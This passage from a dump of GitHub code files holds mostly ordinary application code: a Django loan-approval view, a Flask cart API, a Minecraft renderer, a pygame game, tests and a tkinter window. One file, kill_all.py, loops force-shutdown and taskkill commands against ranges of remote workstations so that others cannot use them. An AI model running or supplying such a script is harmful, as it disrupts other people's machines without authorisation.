updated_at=post_row[\"updated_at\"],\n )\n\n async def _get_post_from_db_for_list_record(\n self, *, post_row: Record, comments_limit: int\n ) -> PostWithComments:\n user_id = post_row[\"user_id\"]\n post_id = post_row[\"id\"]\n\n user_info = await self._users_repo.get_user_by_id(id=user_id)\n\n comments = await self._comments_repo.get_comment_list(\n post_id=post_id, limit=comments_limit\n )\n\n return PostWithComments(\n id_=post_id,\n store_id=post_row[\"store_id\"],\n user_id=user_id,\n 
user_wallet_address=user_info.wallet_address\n if user_info and user_info.wallet_address is not None\n else \"訪客\",\n user_image=user_info.image if user_info else None,\n body=post_row[\"body\"],\n image_url=post_row[\"image_url\"],\n rating=post_row[\"rating\"],\n comments=comments.comments,\n status=post_row[\"status\"],\n created_at=post_row[\"created_at\"],\n updated_at=post_row[\"updated_at\"],\n )\n\n async def _get_post_list_total_from_db_record(self, *, post_row: Record) -> int:\n return post_row[\"total\"]\n\n async def create_new_post(\n self,\n *,\n store_id: int,\n user_id: int,\n body: Optional[str] = None,\n image_url: Optional[str] = None,\n rating: Optional[float] = None,\n status: int = 1,\n ) -> Post:\n new_post = Post(\n store_id=store_id,\n user_id=user_id,\n body=body,\n image_url=image_url,\n rating=rating,\n status=status,\n )\n\n async with self.connection.transaction():\n post_row = await queries.create_post(\n self.connection,\n store_id=store_id,\n user_id=user_id,\n body=body,\n image_url=image_url,\n rating=rating,\n status=status,\n )\n\n return new_post.copy(update=dict(post_row))\n\n async def update_post(\n self,\n *,\n post_in_db: PostWithWalletAddress,\n body: Optional[str] = None,\n image_url: Optional[str] = None,\n rating: Optional[float] = None,\n status: Optional[int] = None,\n ) -> PostWithWalletAddress:\n post_in_db.body = body or post_in_db.body\n post_in_db.image_url = image_url or post_in_db.image_url\n post_in_db.rating = rating if rating is not None else post_in_db.rating\n post_in_db.status = status if status is not None else post_in_db.status\n\n async with self.connection.transaction():\n post_in_db.updated_at = await queries.update_post_by_id(\n self.connection,\n id=post_in_db.id_,\n new_body=post_in_db.body,\n new_image_url=post_in_db.image_url,\n new_rating=post_in_db.rating,\n new_status=post_in_db.status,\n )\n\n return post_in_db\n","repo_name":"world-of-ramen/ramen-backend","sub_path":"app/db/repositories/posts.py","file_name":"posts.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31911779657","text":"#view functions takes a Web request and returns a Web response\n#houses most of the algorithm / logic\n\nfrom django.shortcuts import render\nfrom django.core import serializers\nfrom django.http import JsonResponse\n\nfrom .models import approvals\nfrom .serializers import ApprovalsSerializer\nfrom .forms import ApprovalForm\n\nfrom rest_framework import viewsets\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.parsers import JSONParser\n\nfrom sklearn import preprocessing\nfrom sklearn.externals import joblib\n\nimport numpy as np \nimport pandas as pd \nimport pickle \nimport json\nimport tensorflow.keras\n\n# from .loan_model import calculate\n\nclass ApprovalsView(viewsets.ModelViewSet):\n\tqueryset = approvals.objects.all()\n\tserializer_class = ApprovalsSerializer\n\ndef approvereject(unit):\n\ttry:\n\t\tmdl = joblib.load('C:/Users/Hudson Yuen/OneDrive/edits/loan_approval/loan_model.pkl')\n\t\tscalers = joblib.load('C:/Users/Hudson Yuen/OneDrive/edits/loan_approval/scaler.pkl')\n\n\t\t# data = request.data\n\t\t# unit = np.array(list(data.values))\n\t\t# unit = unit.reshape(-1, 1)\n\n\t\tX = scalers.transform(unit)\n\t\ty_pred = mdl.predict(X)\n\t\ty_pred = (y_pred > 0.55)\n\n\t\tdf = pd.DataFrame(y_pred, columns = 
['Status'])\n\t\tdf = df.replace({True: 'Approved', False: 'Rejected'})\n\t\treturn JsonResponse('Your loan status is: {}'.format(df), safe = False)\n\t\n\texcept ValueError as e:\n\t\treturn Response(e.args[0], status.HTTP_400_BAD_REQUEST)\n\ndef ohevalue(df):\n\tohe_col = joblib.load('C:/Users/Hudson Yuen/OneDrive/edits/loan_approval/ohe_col.pkl')\n\tcat_columns = ['Gender', 'Married', 'Graduated', 'Self_Employed', 'Property_Area']\n\tdf_processed = pd.get_dummies(df, columns = cat_columns)\n\n\tnew_dict = {}\n\tfor i in ohe_col:\n\t\tif i in df_processed.columns:\n\t\t\tnew_dict[i] = df_processed[i].values\n\t\telse:\n\t\t\tnew_dict[i] = 0\n\n\tnew_df = pd.DataFrame(new_dict)\n\treturn new_df\n\ndef userform(request):\n\tif request.method == 'POST':\n\t\tform = ApprovalForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tfirst_name = form.cleaned_data['first_name']\n\t\t\tlast_name = form.cleaned_data['last_name']\n\t\t\tDependents = form.cleaned_data['Dependents']\n\t\t\tApplicantIncome = form.cleaned_data['ApplicantIncome']\n\t\t\tCoapplicantIncome = form.cleaned_data['CoapplicantIncome']\n\t\t\tLoanAmount = form.cleaned_data['LoanAmount']\n\t\t\tLoan_Amount_Term = form.cleaned_data['Loan_Amount_Term']\n\t\t\tCredit_History = form.cleaned_data['Credit_History']\n\t\t\tGender = form.cleaned_data['Gender']\n\t\t\tMarried = form.cleaned_data['Married']\n\t\t\tGraduated = form.cleaned_data['Graduated']\n\t\t\tSelf_Employed = form.cleaned_data['Self_Employed']\n\t\t\tProperty_Area = form.cleaned_data['Property_Area']\n\n\t\t\tDict = (request.POST).dict()\n\t\t\tdf = pd.DataFrame(Dict, index = [0])\n\t\t\tprint(approvereject(ohevalue(df)))\n\telse: \n\t\tform = ApprovalForm()\n\n\treturn render(request, 'apiform/userform.html', {'form': form})","repo_name":"hudyu17/loan_approval","sub_path":"ApprovalAPI/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6170179916","text":"from re import I\nfrom flask import Response, request\nfrom flask_jwt_extended.utils import get_jwt_identity\nfrom flask_jwt_extended.view_decorators import jwt_required\nfrom mongoengine.errors import DoesNotExist\nfrom database.models import Product, User\nfrom flask_restful import Resource\nfrom utils.utils import *\nfrom urllib.parse import unquote\nfrom bson import json_util\nimport json\n\nclass CartApi(Resource):\n @jwt_required()\n def post(self):\n body = request.get_json()\n user_id = get_jwt_identity()\n product_id = body.get('product_id')\n quantity = body.get('quantity')\n if quantity == 0:\n try:\n user = User.objects.get(id=user_id, cart__product_id=product_id)\n except DoesNotExist:\n return {'error': 'Trying to delete an item that is not in the cart'}, 404\n else:\n for i in range(len(user.cart)):\n item = user.cart[i]\n if item['product_id'] == product_id:\n index = i\n break\n user.cart.pop(index)\n user.save()\n return {'msg': 'Success'}, 200\n else:\n try:\n user = User.objects.get(id=user_id, cart__product_id=product_id)\n except DoesNotExist:\n user = User.objects.get(id=user_id)\n new_dict = {\"product_id\": product_id, \"quantity\": quantity}\n if user.cart:\n user.cart.append(new_dict)\n else:\n user.cart = [new_dict]\n else:\n for item in user.cart:\n if(item['product_id'] == product_id):\n item['quantity'] = quantity\n user.save()\n return {'msg': 'Success'}, 200\n \n @jwt_required()\n def get(self):\n user_id = get_jwt_identity()\n user = 
User.objects.get(id=user_id)\n cart_items_with_quantity = []\n invalid_item_index = []\n cnt = 0\n if user.cart:\n for item in user.cart:\n try:\n cart_item = json.loads(Product.objects.get(id=item['product_id']).to_json())\n except DoesNotExist:\n invalid_item_index.append(cnt)\n else: \n cart_items_with_quantity.append({'product_summary': extract_basic_info(cart_item), 'quantity': item['quantity']})\n cnt+=1\n if invalid_item_index:\n for x in reversed(invalid_item_index):\n user.cart.pop(x)\n user.save()\n return Response(json.dumps(cart_items_with_quantity), mimetype=\"application/json\", status=200)\n","repo_name":"grocery-on-rails/grocery-backend","sub_path":"resources/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18177834020","text":"from bz2 import compress\nfrom keras.models import load_model\nimport keras.backend as K\nimport numpy as np\nimport pandas as pd\nimport random\nimport grpc\nimport minecraft_pb2_grpc\nfrom minecraft_pb2 import *\nimport sys\nimport argparse\nfrom blockid_to_type import blockid_to_type\n\n# connect to minecraft\nchannel = grpc.insecure_channel('localhost:5001')\nclient = minecraft_pb2_grpc.MinecraftServiceStub(channel)\n\n# mapping of blocks to compressed block categories\nmapping_df = pd.read_csv('../compression_csv.csv')\nid_to_type = {0:'AIR', 1:'STONE', 2:'GRASS', 5:'PLANKS', 8:'WATER', 12:'SAND', 18:'LEAVES', 20:'GLASS', 22:'LAPIS_BLOCK', 37:'YELLOW_FLOWER', 43:'STONE_SLAB', 53:'OAK_STAIRS', 85:'FENCE'}\n\n# This is hacky, but because we sort when we map the compressed values, we can decompress them by using the models output as an index for this list. 0 will always be air, 8 will always be glass (or w/e), etc\n# compressed_blocks = [0, 1, 2, 5, 12, 18, 20, 53, 85, 126]\n\n\nBOUNDS_WORLD = [[-30000000, 29999999], [4, 255], [-30000000, 29999999]]\nDIRECTIONS = [\"N\", \"W\", \"S\", \"E\", \"U\", \"D\"]\nDIRECTIONS_2D = [\"W\", \"E\", \"U\", \"D\"]\nORIENTATIONS = [\"O.N\", \"O.W\", \"O.S\", \"O.E\", \"O.U\", \"O.D\"]\n\n\nclass EvoRenderer():\n def __init__(self, model, model_type, bin_or_cat, struct_num, offset_x=20, offset_y=20):\n self.model = model\n self.struct_num = struct_num\n self.model_type = model_type\n self.bin_or_cat = bin_or_cat\n self.latent_size = model.layers[0].input_shape[0][1]\n self.offset_x = offset_x\n self.offset_y = offset_y\n self.compressed_blocks = [0, 1, 2, 5, 12, 18, 20, 53, 85, 126]\n self.offset = [0,0,0]\n #TODO: get the size of the structure we're using by looking at the last layer of our generative model\n\n\n # Evocraft variables\n self.BOUNDS_WORLD = [[-30000000, 29999999], [4, 255], [-30000000, 29999999]]\n self.DIRECTIONS = [\"N\", \"W\", \"S\", \"E\", \"U\", \"D\"]\n self.DIRECTIONS_2D = [\"W\", \"E\", \"U\", \"D\"]\n self.ORIENTATIONS = [\"O.N\", \"O.W\", \"O.S\", \"O.E\", \"O.U\", \"O.D\"]\n\n # clear map\n self.clean_zone([200, 200, 200], [0, 0, 0])\n\n # read the mapping dataframe\n self.mapping_df = pd.read_csv('../compression_csv.csv')\n\n # connect to minecraft server\n self.channel = grpc.insecure_channel('localhost:5001')\n self.client = minecraft_pb2_grpc.MinecraftServiceStub(channel)\n\n\n\n def decompress(self, gen_structs):\n # turns integer values back into block IDs by inverting our compression\n for val in np.unique(gen_structs):\n gen_structs[gen_structs == val] = self.compressed_blocks[val]\n\n return gen_structs\n\n\n # take latent vectors, and generate 
structures from them\n    def generate_from_latent_categorical(self, model, latent_vectors):\n        generated_structures = model.predict(latent_vectors)\n\n        # a categorical GAN will output one-hot encoded, so this must be turned back into categorical\n        generated_structures = np.argmax(generated_structures, axis=4)\n\n        return generated_structures\n\n    # take latent vectors, and generate structures from them\n\n    def generate_from_latent_binary(self, model, latent_vectors):\n        generated_structures = model.predict(latent_vectors)\n        return generated_structures\n\n\n    # generates an array of random normal latent vectors\n    def generate_latents_rn(self):\n        return np.random.normal(0, 1, (self.struct_num, self.latent_size))\n\n\n    \"\"\"RENDERING HELPERS\"\"\"\n    def bound_coordinate(self, value, coord):\n        \"\"\"\n        Restrict the coordinate to the bounds.\n        INPUT:\n            value: a value\n            coord: the index of the coordinate (0,1,2)\n\n        OUTPUT:\n            the value bounded according to the bounds registered in BOUNDS_MINECRAFT above.\n        \"\"\"\n        low = BOUNDS_WORLD[coord][0]\n        high = BOUNDS_WORLD[coord][1]\n        return max(low, min(high, value))\n\n    def bounded(self, position):\n        \"\"\"\n        Bounds the position according to BOUNDS_WORLD.\n        INPUT:\n            position: a 3D position.\n\n        OUTPUT:\n            bounded_position: a 3D position, within the boundaries given by BOUNDS_WORLD\n\n        \"\"\"\n        bounded_position = [self.bound_coordinate(position[0], 0), self.bound_coordinate(\n            position[1], 1), self.bound_coordinate(position[2], 2)]\n        return bounded_position\n\n    def build_compression_list(self, mapping_df):\n        pass\n\n    # spawns a building\n    def build_zone(self, blocks, offset):\n        \"\"\"\n        Build a 3D structure, given by a tensor specifying the value of each block type at each position (3D), and possibly orientations\n        Inputs:\n            blocks: np array size Mx*My*MZ, where Mx,My,Mz are bounds given as input.\n\n        \"\"\"\n        positions = []\n        blocks_index = []\n\n        for x in range(blocks.shape[0]):\n            for y in range(blocks.shape[1]): # this is height in minecraft\n                for z in range(blocks.shape[2]):\n\n                    # get block type (will be a category from 0 to 9)\n                    block_id = int(blocks[x, y, z])\n\n                    # hacky decompression\n                    block_id = self.compressed_blocks[block_id]\n\n                    blocks_index.append(block_id)\n                    position = self.bounded([x+offset[0], y+offset[1], z+offset[2]])\n                    positions.append(position)\n\n        zone = [offset[0], offset[1], offset[2], offset[0]+blocks.shape[0],\n                offset[1]+blocks.shape[1], offset[2]+blocks.shape[2]]\n        response = client.spawnBlocks(Blocks(blocks=[Block(position=Point(x=int(positions[i][0]), y=int(positions[i][1]), z=int(\n            positions[i][2])), type=blockid_to_type[blocks_index[i]], orientation=NORTH) for i in range(len(blocks_index))]))\n\n        return blocks_index\n\n\n    #TODO: everything below this\n    \"\"\"CLEANING MAP POST-SELECTION\"\"\"\n    def clean_positions(self, positions):\n        \"\"\"\n        As a way to clear out a space, place a block of AIR in each of the indicated positions.\n        Input:\n            positions: np.array of size N*3\n        \"\"\"\n        for i in range(positions.shape[0]):\n            response = client.spawnBlocks(Blocks(blocks=[Block(position=Point(x=int(positions[i, 0]), y=int(\n                positions[i, 1]), z=int(positions[i, 2])), type=AIR, orientation=NORTH)]))\n\n\n    def clean_zone(self, bounds, offset):\n        \"\"\"\n        Cleans an area of space within certain bounds, by replacing them by block of AIR.\n        Input:\n            bounds: dimensions of the zone, list of 3 elements.\n            offset: offset position.\n\n        \"\"\"\n        zone = [offset[0], 4, offset[2], offset[0] +\n                bounds[0], 4+bounds[1], offset[2]+bounds[2]]\n        print(\"Cleaning 
the following zone:\", zone)\n response = client.fillCube(FillCubeRequest(\n cube=Cube(min=Point(x=int(offset[0]-10), y=int(4), z=int(offset[2]-10)), max=Point(x=int(offset[0]+bounds[0]+10), y=int(\n 4+bounds[1]+10), z=int(offset[2]+bounds[2]+10))),\n type=AIR\n ))\n print(response)\n\n # wasserstein loss used for WGAN models. Needed to load WGAN from file\n def wasserstein_loss(self, y_true, y_pred):\n return K.mean(y_true * y_pred)\n\n\n def render(self, model):\n print(\"rendering structures...\")\n latents = self.generate_latents_rn()\n if self.bin_or_cat == \"bin\":\n structs = self.generate_from_latent_categorical(model, latents)\n else:\n structs = self.generate_from_latent_categorical(model, latents)\n\n for struct in structs:\n # use evocraft to draw all these into the server.\n rendered_struc = self.build_zone(struct, self.offset)\n self.offset[0] += self.offset_x\n self.offset[0] = 0\n self.offset[2] += - self.offset_y\n\n\n","repo_name":"TimMerino1710/Minecraft-Interactive-Evolution","sub_path":"interactive-evolution/evocraftrender.py","file_name":"evocraftrender.py","file_ext":"py","file_size_in_byte":7918,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"39688090841","text":"from unittest import TestCase\n\nfrom integration.resources.simple_dependency_classes import (\n FirstBaseChildrenDependencyClass,\n MixedDependenciesClientClass,\n SecondBaseChildrenDependencyClass,\n SimpleDependencyClientClass,\n SimpleDependencyDependencyClass,\n)\n\nfrom yandil.configuration.configuration_container import ConfigurationContainer\nfrom yandil.container import Container\nfrom yandil.dependency_filler import DependencyFiller\n\n\nclass TestDependencyFiller(TestCase):\n def setUp(self) -> None:\n self.container = Container(\n configuration_container=ConfigurationContainer(),\n )\n self.container.add(SimpleDependencyDependencyClass)\n self.container.add(FirstBaseChildrenDependencyClass)\n self.container.add(SecondBaseChildrenDependencyClass)\n self.dependency_filler = DependencyFiller(\n container=self.container,\n )\n\n def test_fill_dependencies(self):\n self.dependency_filler.fill(SimpleDependencyClientClass)\n\n container_dependency_class_instance = self.container[SimpleDependencyDependencyClass]\n client_class_instance = SimpleDependencyClientClass()\n self.assertIsInstance(client_class_instance, SimpleDependencyClientClass)\n self.assertEqual(container_dependency_class_instance, client_class_instance.dependency)\n\n def test_fill_dependencies_with_fixed_args(self):\n self.dependency_filler.fill(MixedDependenciesClientClass)\n\n container_dependency_class_instance = self.container[SimpleDependencyDependencyClass]\n client_class_instance = MixedDependenciesClientClass(\"arg\", kwarg=20)\n self.assertIsInstance(client_class_instance, MixedDependenciesClientClass)\n self.assertEqual(container_dependency_class_instance, client_class_instance.dependency)\n self.assertEqual(\"arg\", client_class_instance.arg)\n self.assertEqual(20, client_class_instance.kwarg)\n self.assertIsNone(client_class_instance.client_dependency_class)\n","repo_name":"DeejayRevok/yandil","sub_path":"tests/integration/test_dependency_filler.py","file_name":"test_dependency_filler.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"18687599863","text":"import csv\r\nfrom tkinter import*\r\nfrom tkinter import ttk\r\nfrom PIL import Image,ImageTk\r\nimport 
os\r\n\r\nclass See_Attendance_Section:\r\n    def __init__(self,root):\r\n        #Setting Up window form\r\n        self.root=root\r\n        self.root.geometry(\"670x100+480+390\")\r\n        self.root.title(\"See Attendance\") \r\n        self.root.resizable(False,False)\r\n        self.root.focus_force()\r\n        \r\n        bg_img = Label(self.root,bg=\"white\")\r\n        bg_img.place(x=0,y=0,relwidth=1,relheight=1)\r\n        \r\n        # Student Attendance Button\r\n        start_atten=Image.open(r\"Images\\Student_See_Attendance.png\") \r\n        start_atten=start_atten.resize((300,50),Image.ANTIALIAS)\r\n        self.photostart_atten=ImageTk.PhotoImage(start_atten) \r\n\r\n        b1=Button(bg_img,image=self.photostart_atten,command=self.std_atndd,cursor=\"hand2\",bd=2,relief=RIDGE,fg=\"white\",bg=\"black\",activeforeground=\"black\",activebackground=\"black\")\r\n        b1.place(x=5,y=20,width=300,height=50)\r\n\r\n        # Teacher Attendance Button\r\n        save_atten=Image.open(r\"Images\\Teacher_See_Attendance.png\") \r\n        save_atten=save_atten.resize((300,50),Image.ANTIALIAS)\r\n        self.photosave_atten=ImageTk.PhotoImage(save_atten) \r\n\r\n        b2=Button(bg_img,image=self.photosave_atten,command=self.tch_atndd,cursor=\"hand2\",bd=2,relief=RIDGE,fg=\"white\",bg=\"black\",activeforeground=\"black\",activebackground=\"black\")\r\n        b2.place(x=355,y=20,width=300,height=50)\r\n        \r\n    def std_atndd(self):\r\n        os.startfile(\"Attendance_Sheet\")\r\n        \r\n    def tch_atndd(self):\r\n        os.startfile(\"Teacher_Attendance_Sheet\")\r\n\r\nif __name__ == \"__main__\":\r\n    root=Tk()\r\n    obj=See_Attendance_Section(root)\r\n    root.mainloop()","repo_name":"DipakAgarwal0703/FRAMS","sub_path":"See_Attendance.py","file_name":"See_Attendance.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"29872103303","text":"import pygame\n# from random import choice, randint\nfrom my_basic_functions import *\n\nfrom pygame.locals import (\n    K_UP,\n    K_DOWN,\n    K_LEFT,\n    K_RIGHT,\n    K_ESCAPE,\n    KEYDOWN,\n    QUIT,\n    K_a,\n    K_b,\n)\npygame.init()\n\n# Window Parameters\nGRID_SIZE = 48\nNUMBER_OF_SQUARES = 17\nGUI_SIZE = 2\nTEXT_RECORD_SIZE = 4\nWIDTH = GRID_SIZE * (NUMBER_OF_SQUARES + TEXT_RECORD_SIZE) # screen width\nLENGTH = GRID_SIZE * (NUMBER_OF_SQUARES + GUI_SIZE)\nscreen = pygame.display.set_mode([WIDTH, LENGTH])\nboardgame = pygame.Surface((NUMBER_OF_SQUARES*GRID_SIZE, NUMBER_OF_SQUARES*GRID_SIZE))\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\n\ndef size_sprites(file_location, grid_size=GRID_SIZE):\n    end_product = pygame.image.load(file_location)\n    end_product = pygame.transform.scale(end_product, (grid_size, grid_size))\n    return end_product\n\n\ndef make_ground(base_map, base_dict, grid_size, number_of_squares):\n    for i in range(number_of_squares):\n        for x in range(number_of_squares):\n            boardgame.blit(base_dict[base_map[x][i]], (x*grid_size, i*grid_size))\n\n\ndef draw_char(lista_char, grid_size):\n    for i in lista_char:\n        boardgame.blit(i.surface, pos_to_coordinates(i.pos_x, i.pos_y, grid_size))\n\n\ndef draw_GUI(list_GUI, grid_size=GRID_SIZE):\n    for i in list_GUI:\n        screen.blit(i, (list_GUI.index(i)*grid_size*2, NUMBER_OF_SQUARES*grid_size))\n        pygame.draw.line(\n            screen,\n            WHITE,\n            (list_GUI.index(i)*grid_size*2,\n            NUMBER_OF_SQUARES*grid_size),\n            (list_GUI.index(i)*grid_size*2,\n            NUMBER_OF_SQUARES*(6+grid_size))\n        )\n\n\ndef update_avatar(base_surface, surface_to_add):\n    return base_surface.blit(surface_to_add, (0, 0))\n\n\n# creatures\nsnake = size_sprites('assets/grey_snake.png')\nelf = 
size_sprites('assets/deep_elf_high_priest.png')\nfire = size_sprites('assets/i-rod_destruction_fire.png')\nogre = size_sprites('assets/ogre.png')\n# floor tiles\nstone_floor = size_sprites('assets/stone_floor.png')\nwater_floor = size_sprites('assets/water_floor.png')\ngrass_floor = size_sprites('assets/grass_floor.png')\n# objects\nrock = size_sprites('assets/rock.png')\nrock2 = size_sprites('assets/rock.png', 96)\narrow = size_sprites('assets/arrow2.png', 96)\nflame = size_sprites('assets/flame.png', 96)\nsnake2 = size_sprites('assets/grey_snake.png', 96)\n# status\nfire_status = pygame.image.load('assets/i-rod_destruction_fire.png')\nwater_status = pygame.image.load('assets/i-water.png')\n\n# dictionary that relates map with sprites\nfloor_dict = {\"s\": stone_floor, \"w\": water_floor, \"g\": grass_floor}\nlevel_map = create_map(NUMBER_OF_SQUARES, floor_dict)\nchar_base_map = [[9, 1]]\n\n\nclass Ogre:\n    def __init__(self):\n        self.surface = size_sprites('assets/ogre.png')\n        self.initial_pos = pos_validator(char_base_map, NUMBER_OF_SQUARES)\n        self.pos_x = self.initial_pos[0]\n        self.pos_y = self.initial_pos[1]\n        self.hp = 15\n        self.wet = False\n        self.old_surface = ogre\n\n    def move_randomly(self):\n        # randint is assumed to be re-exported by my_basic_functions' star import\n        self.pos_x += randint(-1, 1)\n        self.pos_y += randint(-1, 1)\n\n    def get_hurt(self, damage):\n        self.hp -= damage\n\n\nclass Rock:\n    def __init__(self, pos_x, pos_y):\n        self.surface = rock\n        self.pos_x = pos_x\n        self.pos_y = pos_y\n        self.wet = False\n\n\nclass Player:\n    def __init__(self):\n        self.surface = elf\n        self.pos_x = 9\n        self.pos_y = 1\n        self.rock_level = 1\n\n    def move_up(self):\n        if self.pos_y != 0:\n            self.pos_y -= 1\n\n    def move_down(self):\n        if self.pos_y != NUMBER_OF_SQUARES - 1: # number_of_squares - 1 = BOARDGAME\n            self.pos_y += 1\n\n    def move_right(self):\n        if self.pos_x != NUMBER_OF_SQUARES - 1: # number_of_squares - 1 = BOARDGAMES\n            self.pos_x += 1\n\n    def move_left(self):\n        if self.pos_x != 0:\n            self.pos_x -= 1\n\n    def summon_rock(self):\n        for i in get_radius_area([self.pos_x, self.pos_y], self.rock_level):\n            list_char.append(Rock(i[0], i[1]))\n\n\nelfo1 = Player()\n\nogro1 = Ogre()\nogro2 = Ogre()\nlist_char = [Rock(5, 5)]  # Rock requires a position; (5, 5) is an arbitrary starting tile\n# list_char = [Ogre() for i in range(4)]\nlist_char2 = [elfo1]\nlist_GUI = [rock2, snake2, arrow]\n\n\nrunning = True\nwhile running:\n    make_ground(level_map, floor_dict, GRID_SIZE, NUMBER_OF_SQUARES)\n    draw_GUI(list_GUI)\n    draw_char(list_char, GRID_SIZE)\n    draw_char(list_char2, GRID_SIZE)\n    screen.blit(boardgame, (0, 0))\n    # water_tile_checker(list_char, [[0,0], [1, 1], [5, 5]])\n    for event in pygame.event.get():\n        if event.type == KEYDOWN:\n            if event.key == K_UP:\n                elfo1.move_up()\n            elif event.key == K_DOWN:\n                elfo1.move_down()\n            elif event.key == K_LEFT:\n                elfo1.move_left()\n            elif event.key == K_RIGHT:\n                elfo1.move_right()\n            elif event.key == K_a:\n                elfo1.summon_rock()\n            elif event.key == K_b:\n                push_action(list_char, [elfo1.pos_x, elfo1.pos_y])\n            elif event.key == K_ESCAPE:\n                running = False\n        elif event.type == QUIT:\n            running = False\n    pygame.display.flip()\n\npygame.quit()\n","repo_name":"ramirog1994/RogueLike_Tutorial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}{"seq_id":"31647094591","text":"import os\r\nimport sys\r\nimport threading\r\nBASE_NAMES = input(\"Enter a space separated list of base names: \").strip().split()\r\nMIN_NUM = int(input(\"Min Workstation 
number: \"))\r\nMAX_NUM = int(input(\"Max Workstation number: \"))\r\nprint( \"Choose your base name:\\n\\tBase Names:\\n\"+\"0) None\\n\"+\"\\n\".join([str(i+1)+\") \" + BASE_NAMES[i] for i in range(len(BASE_NAMES))]))\r\nOWN_BASE = int(input().strip())-1\r\nOWN_WS = -1\r\nthreads = []\r\nKILL = False\r\nif OWN_BASE > -1:\r\n OWN_WS = int(input(\"Enter your Workstation number: \"))\r\nparams = \"/r /f /t 0\"\r\nTKILL = input(\"Kill remote processes instead of shutdown?(y/n)\").lower()[0] == \"y\"\r\nTO_KILL = [\"chrome\",\"firefox\",\"iexplore\",\"MicrosoftEdge\"]\r\nif TKILL:\r\n NEW_TO_KILL = input(\"Enter proccess names to kill seperated by a space\\nDefault:\\n\"+\"\\n\".join(\"\\t\"+TO_KILL[proc_ind] + (\"\\n\" if proc_ind == len(TO_KILL)-1 else \"\") for proc_ind in range(len(TO_KILL)))).strip().split()\r\n if len(NEW_TO_KILL) > 0:\r\n TO_KILL = NEW_TO_KILL\r\n print(\"Targeting:\\n\" + \"\\n\".join(\"\\t\"+proc for proc in TO_KILL))\r\nelse:\r\n user_params = input(\"Enter shutdown params(default: /r /f /t 0): \").strip()\r\n if len(user_params) > 0:\r\n params = user_params\r\nLOOP_FOREVER = input(\"Loop forever?(y/n)\").strip().lower()[0] == \"y\"\r\ndef pad_if_1(n):\r\n if len(str(n)) == 1:\r\n return \"0\"+str(n)\r\n else:\r\n return str(n)\r\ndef shutdown(ws,params,loop=False):\r\n os.system(\"@echo off & shutdown \"+params+\" /m \\\\\\\\\"+ws + \">nul 2>nul\")\r\n while loop:\r\n if KILL:\r\n return\r\n os.system(\"@echo off & shutdown \"+params+\" /m \\\\\\\\\"+ws + \" >nul 2>nul\")\r\ndef task_kill(ws,loop=False):\r\n for proc in TO_KILL:\r\n os.system(\"@echo off & taskkill /S \"+ws+\" /IM \" + proc + \"* /F >nul 2>nul\")\r\n while loop:\r\n if KILL:\r\n return\r\n for proc in TO_KILL:\r\n os.system(\"@echo off & taskkill /S \"+ws+\" /IM \" + proc + \"* /F >nul 2>nul\")\r\nfor base in BASE_NAMES:\r\n for ws_id in range(MIN_NUM,MAX_NUM+1,1):\r\n ws_name = base+pad_if_1(ws_id)\r\n if OWN_BASE > -1 and OWN_WS > -1 and BASE_NAMES[OWN_BASE] == base and ws_id == OWN_WS:\r\n print(\"\\nSkipping\",ws_name)\r\n continue\r\n print(\"\\nTarget:\",ws_name)\r\n if not TKILL:\r\n print(\"Executing shutdown with params:\",params)\r\n else:\r\n print(\"Killing specified processes\")\r\n if LOOP_FOREVER:\r\n print(\"Looping...\")\r\n if not TKILL:\r\n nthread = threading.Thread(target=shutdown,args=(ws_name,params,LOOP_FOREVER))\r\n threads.append(nthread)\r\n nthread.start()\r\n else:\r\n nthread = threading.Thread(target=task_kill,args=(ws_name,LOOP_FOREVER))\r\n threads.append(nthread)\r\n nthread.start()\r\nwhile len(threads) and not KILL:\r\n try:\r\n pass\r\n except KeyboardInterrupt:\r\n KILL = True\r\n for t in threads:\r\n t.join()\r\n print(\"Exiting...\")\r\n sys.exit(0)\r\nprint(\"\\nDone\")\r\nsys.exit(0)\r\n","repo_name":"WarrenHood/kill_all","sub_path":"kill_all.py","file_name":"kill_all.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72038734452","text":"from nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nimport numpy as np\n\nfrom nltk.corpus import names\nALL_NAMES = set(names.words())\n\ndef read_feature_names():\n with open(\"data/feature_names.txt\", 'r') as f:\n feature_space = f.read().split('\\n')\n return feature_space\n\ndef word_stemmer(words):\n stemmer = PorterStemmer()\n stem_words = [stemmer.stem(o) for o in words]\n return stem_words\n\ndef word_lemmatizer(words):\n lemmatizer = 
